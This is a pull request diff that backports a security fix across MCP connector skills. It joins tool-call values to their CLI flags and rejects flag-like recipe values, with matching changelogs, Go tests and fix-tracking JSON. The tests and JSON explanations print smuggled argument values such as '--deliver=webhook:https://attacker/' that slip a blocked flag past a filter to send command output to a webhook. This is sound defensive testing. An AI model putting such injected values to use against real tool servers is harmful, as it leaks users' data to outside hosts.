### PR TITLE
security(fleet): join MCP tool values to their flag so a value cannot smuggle a blocked root flag (65 connectors + recipe intents)

### DIFF
--- a/skills/abnormal/CHANGELOG.md
+++ b/skills/abnormal/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/abnormal/CHANGELOG.md
+++ b/skills/abnormal/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/abnormal/CHANGELOG.md
+++ b/skills/abnormal/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/abnormal/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/abnormal/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/abnormal/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/abnormal/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/abnormal/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/abnormal/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/abnormal/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/abnormal/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/abnormal/handfixes.json
+++ b/skills/abnormal/handfixes.json
@@ -197,6 +197,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/abnormal/handfixes.json
+++ b/skills/abnormal/handfixes.json
@@ -212,8 +212,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -223,7 +235,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/acronis/CHANGELOG.md
+++ b/skills/acronis/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/acronis/CHANGELOG.md
+++ b/skills/acronis/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/acronis/CHANGELOG.md
+++ b/skills/acronis/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/acronis/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/acronis/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/acronis/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/acronis/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/acronis/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/acronis/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/acronis/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/acronis/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/acronis/cli/internal/mcp/intents.go
+++ b/skills/acronis/cli/internal/mcp/intents.go
@@ -79,10 +79,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/acronis/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/acronis/cli/internal/mcp/recipe_intents_test.go
@@ -34,7 +34,7 @@ func TestRecipeIntentHandlerBuildsRecipeArgs(t *testing.T) {
 		"reconcile",
 		"usages",
 		"--agent",
-		"--tenant", "required-value",
+		"--tenant=required-value",
 	} {
 		if !strings.Contains(got, want) {
 			t.Fatalf("handler output %q missing %q", got, want)
@@ -101,4 +101,15 @@ func recipeToolText(t *testing.T, result *mcplib.CallToolResult) string {
 		t.Fatalf("result content = %T, want TextContent", result.Content[0])
 	}
 	return text.Text
+}
+
+// TestRecipeIntentStringFlagIsJoined guards the hand-fix
+// mcp-recipe-argv-not-flag-like: a recipe flag value is always emitted as
+// one --name=value element, so a value beginning with "--" is contained as
+// the literal value and can never be parsed as a second flag.
+func TestRecipeIntentStringFlagIsJoined(t *testing.T) {
+	got, missing := appendRecipeStringFlag(nil, "tenant", "--deliver=webhook:https://x/", "", true, false)
+	if missing || len(got) != 1 || got[0] != "--tenant=--deliver=webhook:https://x/" {
+		t.Fatalf("appendRecipeStringFlag = %#v (missing=%v), want exactly one joined element", got, missing)
+	}
 }

--- a/skills/acronis/handfixes.json
+++ b/skills/acronis/handfixes.json
@@ -186,8 +186,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -197,7 +209,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/acronis/handfixes.json
+++ b/skills/acronis/handfixes.json
@@ -171,6 +171,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
